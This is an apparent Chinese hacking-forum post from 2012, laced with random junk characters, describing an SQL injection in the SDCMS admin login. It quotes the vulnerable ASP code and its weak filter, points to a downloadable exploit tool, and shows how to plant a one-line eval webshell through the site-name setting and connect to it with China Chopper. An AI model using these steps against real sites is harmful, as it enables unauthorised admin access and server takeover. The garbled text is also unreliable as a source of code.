作者:T00LS 鬼哥
3 v: T N# b, Z/ B4 B漏洞文件:后台目录/index.asp4 L, g5 }; ` H0 p% c+ T, ^
# e5 x; O- t% q5 E8 t" J; h
Sub Check
( C; W; f- l6 _7 M; J- W: h2 G Dim username,password,code,getcode,Rs4 q# m( G. q0 A: S2 e. ^# N+ l
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
, o' i# s9 h: p6 C username=FilterText(Trim(Request.Form("username")),1)
+ K- W3 I( W9 H! X password=FilterText(Trim(Request.Form("password")),1)5 _6 H j# r* b, m/ X% G
code=Trim(Request.Form("yzm"))
. y" W/ w e4 D* u9 Y- l! ~ getcode=Session("SDCMSCode"): B2 x. v% Q7 v5 U
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
. ^2 ~; G. ]+ c) Q/ o5 | IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
" s: U6 J! Q- p% s/ u: q IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied$ h/ Z$ ~# K/ J D, Q
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied+ s9 E+ }. @1 R
IF username="" or password="" Then9 t5 ]: m# b u8 \& v- P
Echo "用户名或密码不能为空"ied
: N1 o) S8 |7 y. R* ^. B Else. k! V1 o9 g+ b( P
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")3 Y+ I7 I' |5 k9 U& X1 o% q, y
IF Rs.Eof Then
' A/ g4 P+ k% { AddLog username,GetIp,"登录失败",1
7 E- x9 j; w" u* s Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"$ h3 D/ Y1 t. |) G3 c
Else
& b3 _. @* h* M3 ^, |1 D/ h Add_Cookies "sdcms_id",Rs(0)/ m( D# V4 ~9 s# q' W
Add_Cookies "sdcms_name",username
1 ^2 I' M& t1 J$ R% ^7 C Add_Cookies "sdcms_pwd",Rs(2)
/ F+ E3 Z w! x: E, o3 S) J3 w; F5 o Add_Cookies "sdcms_admin",Rs(3)
1 a$ e- c2 w) e8 ]5 b7 o+ }$ f Add_Cookies "sdcms_alllever",Rs(4)' L* x5 B- L7 f+ I
Add_Cookies "sdcms_infolever",Rs(5)
9 z' ?' U) F& E4 f0 J Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")' q) Q$ x/ w9 C3 z1 n1 a* |$ Z
AddLog username,GetIp,"登录成功",1! ~2 q$ s4 Y5 w% m
'自动删除30天前的Log记录7 z2 g) J2 }4 l9 @) e
IF Sdcms_DataType Then5 |, I" t- {/ Z4 U. |
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
/ a1 E% e6 s& _( n Else
. |; C8 a# e" c* j Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")% p0 o9 m) W8 u- z
End IF
+ C) ?5 y$ r' J8 {. H/ Q Go("sdcms_index.asp")
' w& f0 F9 O! \8 i5 z, K8 |: A End IF
p& a+ r6 Z$ [) S Rs.Close
( J5 t3 O% n7 M# p' I8 G Set Rs=Nothing8 S4 L' }) v) a! z
End IF
& X# _% M% k/ |( PEnd Sub* o% @2 N8 _; ^2 j6 L! [- F
6 X; E+ c0 U9 Z’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码 X4 F2 @. S' G# w4 R
; h* W' ~2 _8 H: k. k; @( MFunction FilterText(ByVal t0,ByVal t1)0 `" R+ |- I1 E* D0 w) h
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
9 G7 {' N ?. x! L t0=Trim(t0)
; [+ a( R7 w' D1 G' x! a, B Select Case t1
8 y6 s5 i. J& s9 f$ Q Case "1"
( ?- I8 W4 G) S& |2 O& i9 f t0=Replace(t0,Chr(32),"")4 f6 @3 z, k, s) P* Q4 r
t0=Replace(t0,Chr(13),"")
3 ]- q. G, O; E% c9 s' S1 l6 t t0=Replace(t0,Chr(10)&Chr(10),"")% R2 m/ u1 X; {# V7 {- l
t0=Replace(t0,Chr(10),"")
; l4 z! W* K7 m R, m" o Case "2"
, q7 I* p! V% D3 I. ]8 b1 Y t0=Replace(t0,Chr(8),"")'回格
1 C0 g6 S! {" J" ~2 T( v$ W t0=Replace(t0,Chr(9),"")'tab(水平制表符)4 z, y: u4 a4 t+ h
t0=Replace(t0,Chr(10),"")'换行/ j d( E' O a
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
. I, R. f6 E' S t0=Replace(t0,Chr(12),"")'换页
: z5 O' a2 U% m* m t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
( Z @& v0 x& c9 G" D/ ^ t0=Replace(t0,Chr(22),"")7 Y9 R0 x _; A. q' y% C% V& u0 {
t0=Replace(t0,Chr(32),"")'空格 SPACE# _2 G$ }% Q/ x" t( e. G8 N. n
t0=Replace(t0,Chr(33),"")'!5 L# r' B& L9 n. _5 ~) [& u
t0=Replace(t0,Chr(34),"")'"5 B! m- S4 q9 x# y$ ~. G# o; O/ d( d
t0=Replace(t0,Chr(35),"")'#6 o8 t; p, q5 H
t0=Replace(t0,Chr(36),"")'$
' J l# U& w; ^' q( m* ]% ^; u7 I t0=Replace(t0,Chr(37),"")'%; |* u* g- F" h* ~: ^$ v& b0 N
t0=Replace(t0,Chr(38),"")'&" ]* A- S7 a1 k N( L
t0=Replace(t0,Chr(39),"")'': h6 p# Q/ U0 V8 u3 w
t0=Replace(t0,Chr(40),"")'(
5 y+ o' v% g+ h t0=Replace(t0,Chr(41),"")')
' L& M( M( H: J, u1 v t0=Replace(t0,Chr(42),"")'*: Z& R! J' o5 n' W0 A
t0=Replace(t0,Chr(43),"")'+2 r! W! @2 I7 ]: q3 }7 P3 E
t0=Replace(t0,Chr(44),"")',4 p2 n5 C2 m; D( k0 W( }
t0=Replace(t0,Chr(45),"")'-% a' f- p; W) q- G0 C
t0=Replace(t0,Chr(46),"")'.! B, v& X! m0 D9 n/ |' p" C
t0=Replace(t0,Chr(47),"")'/4 k: I* h/ `7 S& T0 C+ j
t0=Replace(t0,Chr(58),"")': d! Q4 K4 N2 C1 b7 d7 v0 Z
t0=Replace(t0,Chr(59),"")';/ ~0 T$ k9 s* H0 p; P
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>9 g+ _7 Y2 S I) z" x/ e; X
t0=Replace(t0,Chr(63),"")'?
8 Q; v$ R8 `0 d% q: S+ D9 O3 P t0=Replace(t0,Chr(64),"")'@
& }6 |" x% u6 N7 f% h t0=Replace(t0,Chr(91),"")'\
! D' ^, ^0 q2 N/ v! d' T t0=Replace(t0,Chr(92),"")'\
: P; F' `$ W$ }; b! C t0=Replace(t0,Chr(93),"")']
# l$ b: e( b3 Z2 K9 c$ t- E0 P+ T t0=Replace(t0,Chr(94),"")'^
- T0 @( V8 r4 e t0=Replace(t0,Chr(95),"")'_
8 D/ @6 |) A N2 c t0=Replace(t0,Chr(96),"")'`
, T' v' O- D% f t0=Replace(t0,Chr(123),"")'{
% P5 I/ b: D- q t0=Replace(t0,Chr(124),"")'|5 ]+ ^ f+ J- b6 d1 `
t0=Replace(t0,Chr(125),"")'}
2 g7 h. \5 T0 U; h- A t0=Replace(t0,Chr(126),"")'~
6 ]6 V7 ~' |/ n o Case Else- ?$ `+ w% C9 y' k4 }# h' }
t0=Replace(t0, "&", "&")
* x$ T+ L& h* O# ?' W: a! K t0=Replace(t0, "'", "'")% E v" b8 `* `5 u G$ ^1 L
t0=Replace(t0, """", """): @* \& K# \8 g0 u
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
0 X- i' ?% b# S* p& P1 W End Select
9 Y2 U0 A1 G7 |0 M3 u' z IF Instr(Lcase(t0),"expression")>0 Then
0 S. U, [1 V5 K5 G t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
7 C+ B9 Y! |8 Q- o/ q" Y End If, v' H/ p9 ?# e: Y
FilterText=t0
+ k; ~8 X4 h+ j& g$ n# [. G, E" OEnd Function
, J+ z" D$ K" ~
% v7 ]: W8 V4 g B! I看到没。直接参数是1 只过滤
% P+ K7 N1 c& [/ x7 ~) {( { t0=Replace(t0,Chr(32)," ")
8 P$ B; r; E: ^0 I+ V+ b% j t0=Replace(t0,Chr(13),"")) D; e4 z3 g: Y& u) t! d: g) {4 X- }
t0=Replace(t0,Chr(10)&Chr(10),". R% I1 `7 Q) l2 N3 g
")
& ^* g" B6 W6 i/ X, K2 q t0=Replace(t0,Chr(10),"
) {! r: `* D* r$ R9 ^")$ l# g: v& g* V- [
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
' Z0 N2 F) h5 N0 H Z3 t* K% D9 mEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP9 Z; }# x( | {5 t! p
5 X1 E) Q7 e* K6 E
测试:4 q' f% w4 k8 r, N
; J8 w$ [3 p) r: m/ @% m; s
; s+ e! N8 r3 c( l1 j$ Q现在输入工具上验证码,然后点OK( D! q0 w9 @0 U6 {% \; k
/ z* Y$ P& [" r
9 D- {( D0 B. x8 U2 b+ a& l
看到我们直接进入后台管理界面了,呵呵!
% t6 y3 B& H# m5 ~: m1 e" _" R5 Q" z4 Q0 p& i7 J$ r8 {
( C* e- w2 N2 o1 w. X1 W* L% V% d- f
' t: S) M5 ~' ^& u+ h' h这样直接进入后台了。。。。
u* z) V) }9 H4 n2 l( k
5 A. W$ e, m" p, a3 j - \& e, I& C4 ]+ h
Z/ a* \7 l' ?# H1 S5 S
SDCMS提权:
* x7 ^4 Y8 c2 z( V$ h: L& R/ O4 i, t, k6 M
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?! y) w4 i) r- A) m# v
; a; \* {. O! H K- `! z* g
0 F. ~$ y3 {* N x
4 L! a l X4 y8 `9 u+ i- [OK,现在用菜刀连接下!
. A# F D* K9 B
* i$ N; f) ~( F/ d, a1 J. z' N6 ]
) P* f3 x0 K/ W1 |( ^. r( I4 M @. A* E6 E% h7 q' {1 w) w
% J6 o0 E9 B1 f' s7 Q+ S, \$ C$ v1 M- o, K7 J
|
发表于 2012-11-9 20:57:02
收藏
支持
反对